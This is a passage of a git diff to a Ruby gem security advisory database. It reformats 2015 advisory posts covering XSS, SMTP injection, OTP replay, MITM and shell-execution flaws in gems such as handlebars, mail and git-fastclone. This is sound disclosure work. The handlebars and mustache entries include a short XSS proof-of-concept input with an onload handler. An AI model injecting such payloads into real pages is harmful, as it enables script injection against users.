+    - https://web.archive.org/web/20160331140223/https://spreecommerce.com/blog/security-updates-2015-7-20
+    - https://github.com/rubysec/bundler-audit/issues/106
+---
diff --git a/advisories/_posts/2015-07-21-CVE-2015-5378.md b/advisories/_posts/2015-07-21-CVE-2015-5378.md
index dbb93642..cff67a86 100644
--- a/advisories/_posts/2015-07-21-CVE-2015-5378.md
+++ b/advisories/_posts/2015-07-21-CVE-2015-5378.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2015-5378 (logstash-core): Logstash: SSL/TLS FREAK Attack'
-comments: false
-categories:
-- logstash-core
-advisory:
-  gem: logstash-core
-  cve: 2015-5378
-  ghsa: g6rc-3fpq-w2gr
-  url: https://packetstormsecurity.com/files/132800/Logstash-1.5.2-SSL-TLS-FREAK.html
-  title: 'Logstash: SSL/TLS FREAK Attack'
-  date: 2015-07-21
-  description: |
-    Logstash: SSL/TLS FREAK Attack: Logstash 1.5.x before 1.5.3 and
-    1.4.x before 1.4.4 allows remote attackers to read communications
-    between Logstash Forwarder agent and Logstash server.
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 1.4.4"
-  - ">= 1.5.3"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2015-5378
-    - https://packetstormsecurity.com/files/132800/Logstash-1.5.2-SSL-TLS-FREAK.html
-    - https://sca.analysiscenter.veracode.com/vulnerability-database/security/factoring-attack-rsa-export-keys-freak/ruby/sid-1745/summary
-    - https://github.com/rubysec/ruby-advisory-db/issues/238
-    - https://www.elastic.co/community/security
-    - https://github.com/advisories/GHSA-g6rc-3fpq-w2gr
-    - https://web.archive.org/web/20181211080524/http://www.securityfocus.com/bid/76015
----
+---
+layout: advisory
+title: 'CVE-2015-5378 (logstash-core): Logstash: SSL/TLS FREAK Attack'
+comments: false
+categories:
+- logstash-core
+advisory:
+  gem: logstash-core
+  cve: 2015-5378
+  ghsa: g6rc-3fpq-w2gr
+  url: https://packetstormsecurity.com/files/132800/Logstash-1.5.2-SSL-TLS-FREAK.html
+  title: 'Logstash: SSL/TLS FREAK Attack'
+  date: 2015-07-21
+  description: |
+    Logstash: SSL/TLS FREAK Attack: Logstash 1.5.x before 1.5.3 and
+    1.4.x before 1.4.4 allows remote attackers to read communications
+    between Logstash Forwarder agent and Logstash server.
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 1.4.4"
+  - ">= 1.5.3"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-5378
+    - https://packetstormsecurity.com/files/132800/Logstash-1.5.2-SSL-TLS-FREAK.html
+    - https://sca.analysiscenter.veracode.com/vulnerability-database/security/factoring-attack-rsa-export-keys-freak/ruby/sid-1745/summary
+    - https://github.com/rubysec/ruby-advisory-db/issues/238
+    - https://www.elastic.co/community/security
+    - https://github.com/advisories/GHSA-g6rc-3fpq-w2gr
+    - https://web.archive.org/web/20181211080524/http://www.securityfocus.com/bid/76015
+---
diff --git a/advisories/_posts/2015-07-21-CVE-2015-8857.md b/advisories/_posts/2015-07-21-CVE-2015-8857.md
index ea14f5d0..f671925b 100644
--- a/advisories/_posts/2015-07-21-CVE-2015-8857.md
+++ b/advisories/_posts/2015-07-21-CVE-2015-8857.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2015-8857 (uglifier): uglifier incorrectly handles non-boolean comparisons
-  during minification'
-comments: false
-categories:
-- uglifier
-advisory:
-  gem: uglifier
-  cve: 2015-8857
-  osvdb: 126747
-  ghsa: 34r7-q49f-h37c
-  url: https://github.com/mishoo/UglifyJS2/issues/751
-  title: uglifier incorrectly handles non-boolean comparisons during minification
-  date: 2015-07-21
-  description: |
-    The upstream library for the Ruby uglifier gem, UglifyJS, is
-    affected by a vulnerability that allows a specially crafted
-    Javascript file to have altered functionality after minification.
-
-    This bug, found in UglifyJS versions 2.4.23 and earlier, was demonstrated
-    to allow potentially malicious code to be hidden within secure code,
-    and activated by the minification process.
-
-    For more information, consult:
-    * https://zyan.scripts.mit.edu/blog/backdooring-js
-
-    * CWE: 254 - 7PK - Security Features
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 2.7.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2015-8857
-    - https://github.com/mishoo/UglifyJS/issues/751
-    - https://blog.azuki.vip/backdooring-js
-    - https://www.openwall.com/lists/oss-security/2016/04/20/11
-    - https://github.com/advisories/GHSA-34r7-q49f-h37c
----
+---
+layout: advisory
+title: 'CVE-2015-8857 (uglifier): uglifier incorrectly handles non-boolean comparisons
+  during minification'
+comments: false
+categories:
+- uglifier
+advisory:
+  gem: uglifier
+  cve: 2015-8857
+  osvdb: 126747
+  ghsa: 34r7-q49f-h37c
+  url: https://github.com/mishoo/UglifyJS2/issues/751
+  title: uglifier incorrectly handles non-boolean comparisons during minification
+  date: 2015-07-21
+  description: |
+    The upstream library for the Ruby uglifier gem, UglifyJS, is
+    affected by a vulnerability that allows a specially crafted
+    Javascript file to have altered functionality after minification.
+
+    This bug, found in UglifyJS versions 2.4.23 and earlier, was demonstrated
+    to allow potentially malicious code to be hidden within secure code,
+    and activated by the minification process.
+
+    For more information, consult:
+    * https://zyan.scripts.mit.edu/blog/backdooring-js
+
+    * CWE: 254 - 7PK - Security Features
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 2.7.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-8857
+    - https://github.com/mishoo/UglifyJS/issues/751
+    - https://blog.azuki.vip/backdooring-js
+    - https://www.openwall.com/lists/oss-security/2016/04/20/11
+    - https://github.com/advisories/GHSA-34r7-q49f-h37c
+---
diff --git a/advisories/_posts/2015-07-28-OSVDB-125699.md b/advisories/_posts/2015-07-28-OSVDB-125699.md
index f72cad19..d655ce3b 100644
--- a/advisories/_posts/2015-07-28-OSVDB-125699.md
+++ b/advisories/_posts/2015-07-28-OSVDB-125699.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'OSVDB-125699 (spree): Spree RABL templates rendering allows Arbitrary Code
-  Execution and File Disclosure'
-comments: false
-categories:
-- spree
-advisory:
-  gem: spree
-  osvdb: 125699
-  url: https://web.archive.org/web/20160331133641/spreecommerce.com/blog/security-updates-2015-7-28
-  title: Spree RABL templates rendering allows Arbitrary Code Execution and File Disclosure
-  date: 2015-07-28
-  description: |
-    Spree contains a flaw where the rendering of arbitrary RABL templates
-    allows for execution arbitrary files on the host system, as well as
-    disclosing the existence of files on the system.
-    This is a different issue than OSVDB-125701.
-  patched_versions:
-  - "~> 2.2.13"
-  - "~> 2.3.12"
-  - "~> 2.4.9"
-  - ">= 3.0.3"
-  related:
-    osvdb:
-    - 125701
-    url:
-    - https://github.com/rubysec/bundler-audit/issues/106
-    - https://security.snyk.io/vuln/SNYK-RUBY-SPREE-20237
----
+---
+layout: advisory
+title: 'OSVDB-125699 (spree): Spree RABL templates rendering allows Arbitrary Code
+  Execution and File Disclosure'
+comments: false
+categories:
+- spree
+advisory:
+  gem: spree
+  osvdb: 125699
+  url: https://web.archive.org/web/20160331133641/spreecommerce.com/blog/security-updates-2015-7-28
+  title: Spree RABL templates rendering allows Arbitrary Code Execution and File Disclosure
+  date: 2015-07-28
+  description: |
+    Spree contains a flaw where the rendering of arbitrary RABL templates
+    allows for execution arbitrary files on the host system, as well as
+    disclosing the existence of files on the system.
+    This is a different issue than OSVDB-125701.
+  patched_versions:
+  - "~> 2.2.13"
+  - "~> 2.3.12"
+  - "~> 2.4.9"
+  - ">= 3.0.3"
+  related:
+    osvdb:
+    - 125701
+    url:
+    - https://github.com/rubysec/bundler-audit/issues/106
+    - https://security.snyk.io/vuln/SNYK-RUBY-SPREE-20237
+---
diff --git a/advisories/_posts/2015-08-20-CVE-2015-5619.md b/advisories/_posts/2015-08-20-CVE-2015-5619.md
index 183a649d..39d20b7d 100644
--- a/advisories/_posts/2015-08-20-CVE-2015-5619.md
+++ b/advisories/_posts/2015-08-20-CVE-2015-5619.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2015-5619 (logstash-core): Logstash: Man-In-The Middle attack'
-comments: false
-categories:
-- logstash-core
-advisory:
-  gem: logstash-core
-  cve: 2015-5619
-  ghsa: 68pf-743m-hv2w
-  url: https://www.elastic.co/blog/logstash-1-5-4-and-1-4-5-released
-  title: 'Logstash: Man-In-The Middle attack'
-  date: 2015-08-20
-  description: |
-    Logstash 1.4.x before 1.4.5 and 1.5.x before 1.5.4 with Lumberjack
-    output or the Logstash forwarder does not validate SSL/TLS certificates
-    from the Logstash server, which might allow attackers to obtain
-    sensitive information via a man-in-the-middle attack.
-  cvss_v2: 4.3
-  cvss_v3: 5.9
-  patched_versions:
-  - "~> 1.4.5"
-  - ">= 1.5.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2015-5619
-    - https://www.elastic.co/blog/logstash-1-5-4-and-1-4-5-released
-    - https://www.elastic.co/community/security
-    - https://packetstormsecurity.com/files/133269/Logstash-1.5.3-Man-In-The-Middle.html
-    - https://sca.analysiscenter.veracode.com/vulnerability-database/security/man-middle-mitm-attacks/ruby/sid-1798/summary
-    - https://github.com/advisories/GHSA-68pf-743m-hv2w
----
+---
+layout: advisory
+title: 'CVE-2015-5619 (logstash-core): Logstash: Man-In-The Middle attack'
+comments: false
+categories:
+- logstash-core
+advisory:
+  gem: logstash-core
+  cve: 2015-5619
+  ghsa: 68pf-743m-hv2w
+  url: https://www.elastic.co/blog/logstash-1-5-4-and-1-4-5-released
+  title: 'Logstash: Man-In-The Middle attack'
+  date: 2015-08-20
+  description: |
+    Logstash 1.4.x before 1.4.5 and 1.5.x before 1.5.4 with Lumberjack
+    output or the Logstash forwarder does not validate SSL/TLS certificates
+    from the Logstash server, which might allow attackers to obtain
+    sensitive information via a man-in-the-middle attack.
+  cvss_v2: 4.3
+  cvss_v3: 5.9
+  patched_versions:
+  - "~> 1.4.5"
+  - ">= 1.5.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-5619
+    - https://www.elastic.co/blog/logstash-1-5-4-and-1-4-5-released
+    - https://www.elastic.co/community/security
+    - https://packetstormsecurity.com/files/133269/Logstash-1.5.3-Man-In-The-Middle.html
+    - https://sca.analysiscenter.veracode.com/vulnerability-database/security/man-middle-mitm-attacks/ruby/sid-1798/summary
+    - https://github.com/advisories/GHSA-68pf-743m-hv2w
+---
diff --git a/advisories/_posts/2015-08-24-OSVDB-131671.md b/advisories/_posts/2015-08-24-OSVDB-131671.md
index b645be2b..df6d6a17 100644
--- a/advisories/_posts/2015-08-24-OSVDB-131671.md
+++ b/advisories/_posts/2015-08-24-OSVDB-131671.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'OSVDB-131671 (handlebars-source): handlebars.js - quoteless attributes in
-  templates can lead to XSS'
-comments: false
-categories:
-- handlebars-source
-advisory:
-  gem: handlebars-source
-  osvdb: 131671
-  url: https://security.snyk.io/vuln/SNYK-RUBY-HANDLEBARSSOURCE-20238
-  title: handlebars.js - quoteless attributes in templates can lead to XSS
-  date: 2015-08-24
-  description: |
-    The upstream 'handlebars' node.js module was found to not properly
-    escape equals (=) signs, leading to possible content injection
-    via attributes in templates.
-
-    Example:
-    * Template: <a href={{foo}}/>
-    * Input: { 'foo' : 'test.com onload=alert(1)'}
-    * Rendered result: <a href=test.com onload=alert(1)/>
-  patched_versions:
-  - ">= 4.0.0"
-  related:
-    ghsa:
-    - 9prh-257w-9277
-    url:
-    - https://github.com/handlebars-lang/handlebars.js
-    - https://github.com/handlebars-lang/handlebars.js/compare/v3.0.8...v4.0.0
-    - https://security.snyk.io/vuln/SNYK-RUBY-HANDLEBARSSOURCE-20238
-    - https://github.com/rubysec/bundler-audit/issues/185
-    - https://www.veracode.com/blog/research/handlebarsjs-vulnerability-impact-study
----
+---
+layout: advisory
+title: 'OSVDB-131671 (handlebars-source): handlebars.js - quoteless attributes in
+  templates can lead to XSS'
+comments: false
+categories:
+- handlebars-source
+advisory:
+  gem: handlebars-source
+  osvdb: 131671
+  url: https://security.snyk.io/vuln/SNYK-RUBY-HANDLEBARSSOURCE-20238
+  title: handlebars.js - quoteless attributes in templates can lead to XSS
+  date: 2015-08-24
+  description: |
+    The upstream 'handlebars' node.js module was found to not properly
+    escape equals (=) signs, leading to possible content injection
+    via attributes in templates.
+
+    Example:
+    * Template: <a href={{foo}}/>
+    * Input: { 'foo' : 'test.com onload=alert(1)'}
+    * Rendered result: <a href=test.com onload=alert(1)/>
+  patched_versions:
+  - ">= 4.0.0"
+  related:
+    ghsa:
+    - 9prh-257w-9277
+    url:
+    - https://github.com/handlebars-lang/handlebars.js
+    - https://github.com/handlebars-lang/handlebars.js/compare/v3.0.8...v4.0.0
+    - https://security.snyk.io/vuln/SNYK-RUBY-HANDLEBARSSOURCE-20238
+    - https://github.com/rubysec/bundler-audit/issues/185
+    - https://www.veracode.com/blog/research/handlebarsjs-vulnerability-impact-study
+---
diff --git a/advisories/_posts/2015-09-17-CVE-2015-7225.md b/advisories/_posts/2015-09-17-CVE-2015-7225.md
index 7eac9687..6e54dc9f 100644
--- a/advisories/_posts/2015-09-17-CVE-2015-7225.md
+++ b/advisories/_posts/2015-09-17-CVE-2015-7225.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2015-7225 (devise-two-factor): devise-two-factor 1.1.0 and earlier vulnerable
-  to replay attacks'
-comments: false
-categories:
-- devise-two-factor
-advisory:
-  gem: devise-two-factor
-  cve: 2015-7225
-  ghsa: x489-jjwm-52g7
-  url: http://www.openwall.com/lists/oss-security/2015/09/06/2
-  title: devise-two-factor 1.1.0 and earlier vulnerable to replay attacks
-  date: 2015-09-17
-  description: |
-    A OTP replay vulnerability in devise-two-factor 1.1.0 and earlier allows local
-    attackers to shoulder-surf a user's TOTP verification code and use it to
-    login after the user has authenticated.
-
-    By not "burning" a previously used TOTP, devise-two-factor allows a narrow
-    window of opportunity (aka the timestep period) where an attacker can re-use a
-    verification code.
-
-    Should an attacker possess a given user's authentication
-    credentials, this flaw effectively defeats two-factor authentication for the
-    duration of the timestep.
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 2.0.0"
----
+---
+layout: advisory
+title: 'CVE-2015-7225 (devise-two-factor): devise-two-factor 1.1.0 and earlier vulnerable
+  to replay attacks'
+comments: false
+categories:
+- devise-two-factor
+advisory:
+  gem: devise-two-factor
+  cve: 2015-7225
+  ghsa: x489-jjwm-52g7
+  url: http://www.openwall.com/lists/oss-security/2015/09/06/2
+  title: devise-two-factor 1.1.0 and earlier vulnerable to replay attacks
+  date: 2015-09-17
+  description: |
+    A OTP replay vulnerability in devise-two-factor 1.1.0 and earlier allows local
+    attackers to shoulder-surf a user's TOTP verification code and use it to
+    login after the user has authenticated.
+
+    By not "burning" a previously used TOTP, devise-two-factor allows a narrow
+    window of opportunity (aka the timestep period) where an attacker can re-use a
+    verification code.
+
+    Should an attacker possess a given user's authentication
+    credentials, this flaw effectively defeats two-factor authentication for the
+    duration of the timestep.
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 2.0.0"
+---
diff --git a/advisories/_posts/2015-09-20-CVE-2015-7314.md b/advisories/_posts/2015-09-20-CVE-2015-7314.md
index 0f373ec0..290883af 100644
--- a/advisories/_posts/2015-09-20-CVE-2015-7314.md
+++ b/advisories/_posts/2015-09-20-CVE-2015-7314.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2015-7314 (gollum): gollum Upload File Functionality Permits Arbitrary
-  File Access'
-comments: false
-categories:
-- gollum
-advisory:
-  gem: gollum
-  cve: 2015-7314
-  osvdb: 127779
-  ghsa: m2q3-53fq-7h66
-  url: https://github.com/gollum/gollum/commit/ce68a88293ce3b18c261312392ad33a88bb69ea1
-  title: gollum Upload File Functionality Permits Arbitrary File Access
-  date: 2015-09-20
-  description: |
-    The gollum gem contains a flaw in its upload file functionality that can
-    allow arbitrary file access. This occurs due to a lack of type checking
-    when handling temporary files during the upload process.
-  patched_versions:
-  - ">= 4.0.1"
----
+---
+layout: advisory
+title: 'CVE-2015-7314 (gollum): gollum Upload File Functionality Permits Arbitrary
+  File Access'
+comments: false
+categories:
+- gollum
+advisory:
+  gem: gollum
+  cve: 2015-7314
+  osvdb: 127779
+  ghsa: m2q3-53fq-7h66
+  url: https://github.com/gollum/gollum/commit/ce68a88293ce3b18c261312392ad33a88bb69ea1
+  title: gollum Upload File Functionality Permits Arbitrary File Access
+  date: 2015-09-20
+  description: |
+    The gollum gem contains a flaw in its upload file functionality that can
+    allow arbitrary file access. This occurs due to a lack of type checking
+    when handling temporary files during the upload process.
+  patched_versions:
+  - ">= 4.0.1"
+---
diff --git a/advisories/_posts/2015-10-24-CVE-2017-1000042.md b/advisories/_posts/2015-10-24-CVE-2017-1000042.md
index d58a7ae3..bc8caf24 100644
--- a/advisories/_posts/2015-10-24-CVE-2017-1000042.md
+++ b/advisories/_posts/2015-10-24-CVE-2017-1000042.md
@@ -1,44 +1,44 @@
----
-layout: advisory
-title: 'CVE-2017-1000042 (mapbox-rails): mapbox-rails Content Injection via TileJSON
-  attribute'
-comments: false
-categories:
-- mapbox-rails
-advisory:
-  gem: mapbox-rails
-  cve: 2017-1000042
-  osvdb: 129854
-  ghsa: qr28-7j6p-9hmv
-  url: https://nvd.nist.gov/vuln/detail/CVE-2017-1000042
-  title: mapbox-rails Content Injection via TileJSON attribute
-  date: 2015-10-24
-  description: |
-    Mapbox.js versions 1.x prior to 1.6.5 and 2.x prior to 2.1.7 are vulnerable
-    to a cross-site-scripting attack in certain uncommon usage scenarios.
-
-    If you use L.mapbox.map or L.mapbox.tileLayer to load untrusted TileJSON
-    content from a non-Mapbox URL, it is possible for a malicious user with
-    control over the TileJSON content to inject script content into the
-    "attribution" value of the TileJSON which will be executed in the context of
-    the page using Mapbox.js.
-
-    Such usage is uncommon. The following usage scenarios are not vulnerable:
-
-    * only trusted TileJSON content is loaded
-    * TileJSON content comes only from mapbox.com URLs
-    * a Mapbox map ID is supplied, rather than a TileJSON URL
-
-    * CWE: 79 - Improper Neutralization of Input During Web Page Generation (XSS)
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  patched_versions:
-  - "~> 1.6.5"
-  - ">= 2.1.7"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000042
-    - https://nodesecurity.io/advisories/49
-    - https://hackerone.com/reports/54327
-    - https://github.com/advisories/GHSA-qr28-7j6p-9hmv
----
+---
+layout: advisory
+title: 'CVE-2017-1000042 (mapbox-rails): mapbox-rails Content Injection via TileJSON
+  attribute'
+comments: false
+categories:
+- mapbox-rails
+advisory:
+  gem: mapbox-rails
+  cve: 2017-1000042
+  osvdb: 129854
+  ghsa: qr28-7j6p-9hmv
+  url: https://nvd.nist.gov/vuln/detail/CVE-2017-1000042
+  title: mapbox-rails Content Injection via TileJSON attribute
+  date: 2015-10-24
+  description: |
+    Mapbox.js versions 1.x prior to 1.6.5 and 2.x prior to 2.1.7 are vulnerable
+    to a cross-site-scripting attack in certain uncommon usage scenarios.
+
+    If you use L.mapbox.map or L.mapbox.tileLayer to load untrusted TileJSON
+    content from a non-Mapbox URL, it is possible for a malicious user with
+    control over the TileJSON content to inject script content into the
+    "attribution" value of the TileJSON which will be executed in the context of
+    the page using Mapbox.js.
+
+    Such usage is uncommon. The following usage scenarios are not vulnerable:
+
+    * only trusted TileJSON content is loaded
+    * TileJSON content comes only from mapbox.com URLs
+    * a Mapbox map ID is supplied, rather than a TileJSON URL
+
+    * CWE: 79 - Improper Neutralization of Input During Web Page Generation (XSS)
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  patched_versions:
+  - "~> 1.6.5"
+  - ">= 2.1.7"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000042
+    - https://nodesecurity.io/advisories/49
+    - https://hackerone.com/reports/54327
+    - https://github.com/advisories/GHSA-qr28-7j6p-9hmv
+---
diff --git a/advisories/_posts/2015-11-17-OSVDB-131671.md b/advisories/_posts/2015-11-17-OSVDB-131671.md
index 83e0ee63..c6ad1fe2 100644
--- a/advisories/_posts/2015-11-17-OSVDB-131671.md
+++ b/advisories/_posts/2015-11-17-OSVDB-131671.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'OSVDB-131671 (mustache-js-rails): mustache.js - quoteless attributes in templates
-  can lead to XSS'
-comments: false
-categories:
-- mustache-js-rails
-advisory:
-  gem: mustache-js-rails
-  osvdb: 131671
-  url: https://security.snyk.io/vuln/SNYK-RUBY-MUSTACHEJSRAILS-20242
-  title: mustache.js - quoteless attributes in templates can lead to XSS
-  date: 2015-11-17
-  description: |
-    The upstream 'mustache.js' node.js module was found to not properly
-    escape backtick (`) and equals (=) characters, leading to possible
-    content injection via attributes in templates.
-
-    Example:
-    * Template: <a href={{foo}}/>
-    * Input: { 'foo' : 'test.com onload=alert(1)'}
-    * Rendered result: <a href=test.com onload=alert(1)/>
-  patched_versions:
-  - ">= 2.0.3"
-  related:
-    ghsa:
-    - w3w8-37jv-2c58
-    url:
-    - https://github.com/janl/mustache.js/pull/530
-    - https://security.snyk.io/vuln/SNYK-RUBY-MUSTACHEJSRAILS-20242
-    - https://www.veracode.com/blog/research/handlebarsjs-vulnerability-impact-study
----
+---
+layout: advisory
+title: 'OSVDB-131671 (mustache-js-rails): mustache.js - quoteless attributes in templates
+  can lead to XSS'
+comments: false
+categories:
+- mustache-js-rails
+advisory:
+  gem: mustache-js-rails
+  osvdb: 131671
+  url: https://security.snyk.io/vuln/SNYK-RUBY-MUSTACHEJSRAILS-20242
+  title: mustache.js - quoteless attributes in templates can lead to XSS
+  date: 2015-11-17
+  description: |
+    The upstream 'mustache.js' node.js module was found to not properly
+    escape backtick (`) and equals (=) characters, leading to possible
+    content injection via attributes in templates.
+
+    Example:
+    * Template: <a href={{foo}}/>
+    * Input: { 'foo' : 'test.com onload=alert(1)'}
+    * Rendered result: <a href=test.com onload=alert(1)/>
+  patched_versions:
+  - ">= 2.0.3"
+  related:
+    ghsa:
+    - w3w8-37jv-2c58
+    url:
+    - https://github.com/janl/mustache.js/pull/530
+    - https://security.snyk.io/vuln/SNYK-RUBY-MUSTACHEJSRAILS-20242
+    - https://www.veracode.com/blog/research/handlebarsjs-vulnerability-impact-study
+---
diff --git a/advisories/_posts/2015-11-23-CVE-2015-7519.md b/advisories/_posts/2015-11-23-CVE-2015-7519.md
index 2b901de0..997f4cbd 100644
--- a/advisories/_posts/2015-11-23-CVE-2015-7519.md
+++ b/advisories/_posts/2015-11-23-CVE-2015-7519.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2015-7519 (passenger): Phusion Passenger Server allows to overwrite headers
-  in some cases'
-comments: false
-categories:
-- passenger
-advisory:
-  gem: passenger
-  cve: 2015-7519
-  ghsa: fxwv-953p-7qpf
-  url: https://blog.phusion.nl/2015/12/07/cve-2015-7519/
-  title: Phusion Passenger Server allows to overwrite headers in some cases
-  date: 2015-11-23
-  description: |
-    It is possible in some cases, for clients to overwrite headers set by
-    the server, resulting in a medium level security issue. Passenger 5 uses an SCGI-inspired
-    format to pass headers to Ruby/Python applications, while Passenger 4 uses an SCGI-inspired
-    format to pass headers to all applications. This implies a conversion to UPPER_CASE_WITH_UNDERSCORES
-    whereby the difference between characters like '-' and '_' is lost.
-  cvss_v3: 3.7
-  patched_versions:
-  - "~> 4.0.60"
-  - ">= 5.0.22"
----
+---
+layout: advisory
+title: 'CVE-2015-7519 (passenger): Phusion Passenger Server allows to overwrite headers
+  in some cases'
+comments: false
+categories:
+- passenger
+advisory:
+  gem: passenger
+  cve: 2015-7519
+  ghsa: fxwv-953p-7qpf
+  url: https://blog.phusion.nl/2015/12/07/cve-2015-7519/
+  title: Phusion Passenger Server allows to overwrite headers in some cases
+  date: 2015-11-23
+  description: |
+    It is possible in some cases, for clients to overwrite headers set by
+    the server, resulting in a medium level security issue. Passenger 5 uses an SCGI-inspired
+    format to pass headers to Ruby/Python applications, while Passenger 4 uses an SCGI-inspired
+    format to pass headers to all applications. This implies a conversion to UPPER_CASE_WITH_UNDERSCORES
+    whereby the difference between characters like '-' and '_' is lost.
+  cvss_v3: 3.7
+  patched_versions:
+  - "~> 4.0.60"
+  - ">= 5.0.22"
+---
diff --git a/advisories/_posts/2015-12-09-CVE-2015-9097.md b/advisories/_posts/2015-12-09-CVE-2015-9097.md
index bfd90de8..b8c77b9e 100644
--- a/advisories/_posts/2015-12-09-CVE-2015-9097.md
+++ b/advisories/_posts/2015-12-09-CVE-2015-9097.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2015-9097 (mail): CVE-2015-9097 rubygem-mail: SMTP injection via recipient
-  email addresses'
-comments: false
-categories:
-- mail
-advisory:
-  gem: mail
-  cve: 2015-9097
-  osvdb: 131677
-  ghsa: q86f-fmqf-qrf6
-  url: https://hackerone.com/reports/137631
-  title: 'CVE-2015-9097 rubygem-mail: SMTP injection via recipient email addresses'
-  date: 2015-12-09
-  description: |
-    The mail gem before 2.5.5 for Ruby (aka A Really Ruby Mail Library) is
-    vulnerable to SMTP command injection via CRLF sequences in a RCPT TO or MAIL FROM
-    command, as demonstrated by CRLF sequences immediately before and after a DATA substring.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 2.5.5"
-  related:
-    url:
-    - http://www.mbsd.jp/Whitepaper/smtpi.pdf
-    - https://github.com/mikel/mail/pull/1097
----
+---
+layout: advisory
+title: 'CVE-2015-9097 (mail): CVE-2015-9097 rubygem-mail: SMTP injection via recipient
+  email addresses'
+comments: false
+categories:
+- mail
+advisory:
+  gem: mail
+  cve: 2015-9097
+  osvdb: 131677
+  ghsa: q86f-fmqf-qrf6
+  url: https://hackerone.com/reports/137631
+  title: 'CVE-2015-9097 rubygem-mail: SMTP injection via recipient email addresses'
+  date: 2015-12-09
+  description: |
+    The mail gem before 2.5.5 for Ruby (aka A Really Ruby Mail Library) is
+    vulnerable to SMTP command injection via CRLF sequences in a RCPT TO or MAIL FROM
+    command, as demonstrated by CRLF sequences immediately before and after a DATA substring.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 2.5.5"
+  related:
+    url:
+    - http://www.mbsd.jp/Whitepaper/smtpi.pdf
+    - https://github.com/mikel/mail/pull/1097
+---
diff --git a/advisories/_posts/2015-12-11-CVE-2015-8968.md b/advisories/_posts/2015-12-11-CVE-2015-8968.md
index 466e1b36..1de5f033 100644
--- a/advisories/_posts/2015-12-11-CVE-2015-8968.md
+++ b/advisories/_posts/2015-12-11-CVE-2015-8968.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2015-8968 (git-fastclone): git-fastclone permits arbitrary shell command
-  execution from .gitmodules'
-comments: false
-categories:
-- git-fastclone
-advisory:
-  gem: git-fastclone
-  cve: 2015-8968
-  ghsa: 8gg6-3r63-25m8
-  url: https://hackerone.com/reports/104465
-  title: git-fastclone permits arbitrary shell command execution from .gitmodules
-  date: 2015-12-11
-  description: |
-    Git allows executing arbitrary shell commands using git-remote-ext via a
-    remote URLs. Normally git never requests URLs that the user doesn't
-    specifically request, so this is not a serious security concern. However,
-    submodules did allow the remote repository to specify what URL to clone
-    from.
-
-    If an attacker can instruct a user to run a recursive clone from a
-    repository they control, they can get a client to run an arbitrary shell
-    command. Alternately, if an attacker can MITM an unencrypted git clone,
-    they could exploit this. The ext command will be run if the repository is
-    recursively cloned or if submodules are updated. This attack works when
-    cloning both local and remote repositories.
-  cvss_v3: 8.8
-  patched_versions:
-  - ">= 1.0.1"
----
+---
+layout: advisory
+title: 'CVE-2015-8968 (git-fastclone): git-fastclone permits arbitrary shell command
+  execution from .gitmodules'
+comments: false
+categories:
+- git-fastclone
+advisory:
+  gem: git-fastclone
+  cve: 2015-8968
+  ghsa: 8gg6-3r63-25m8
+  url: https://hackerone.com/reports/104465
+  title: git-fastclone permits arbitrary shell command execution from .gitmodules
+  date: 2015-12-11
+  description: |
+    Git allows executing arbitrary shell commands using git-remote-ext via a
+    remote URLs. Normally git never requests URLs that the user doesn't
+    specifically request, so this is not a serious security concern. However,
+    submodules did allow the remote repository to specify what URL to clone
+    from.
+
+    If an attacker can instruct a user to run a recursive clone from a
+    repository they control, they can get a client to run an arbitrary shell
+    command. Alternately, if an attacker can MITM an unencrypted git clone,
+    they could exploit this. The ext command will be run if the repository is
+    recursively cloned or if submodules are updated. This attack works when
+    cloning both local and remote repositories.
+  cvss_v3: 8.8
+  patched_versions:
+  - ">= 1.0.1"
+---
diff --git a/advisories/_posts/2015-12-15-CVE-2015-5312.md b/advisories/_posts/2015-12-15-CVE-2015-5312.md
index 00ae60ce..6c626170 100644
--- a/advisories/_posts/2015-12-15-CVE-2015-5312.md
+++ b/advisories/_posts/2015-12-15-CVE-2015-5312.md
@@ -1,96 +1,96 @@
----
-layout: advisory
-title: 'CVE-2015-5312 (nokogiri): Nokogiri gem contains several vulnerabilities in
-  libxml2'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2015-5312
-  ghsa: xjqg-9jvg-fgx2
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/aSbgDiwb24s
-  title: Nokogiri gem contains several vulnerabilities in libxml2
-  date: 2015-12-15
-  description: |
-    Nokogiri version 1.6.7.1 has been released, pulling in several upstream
-    patches to the vendored libxml2 to address the following CVEs:
-
-    CVE-2015-5312
-    CVSS v2 Base Score: 7.1 (HIGH)
-    The xmlStringLenDecodeEntities function in parser.c in libxml2
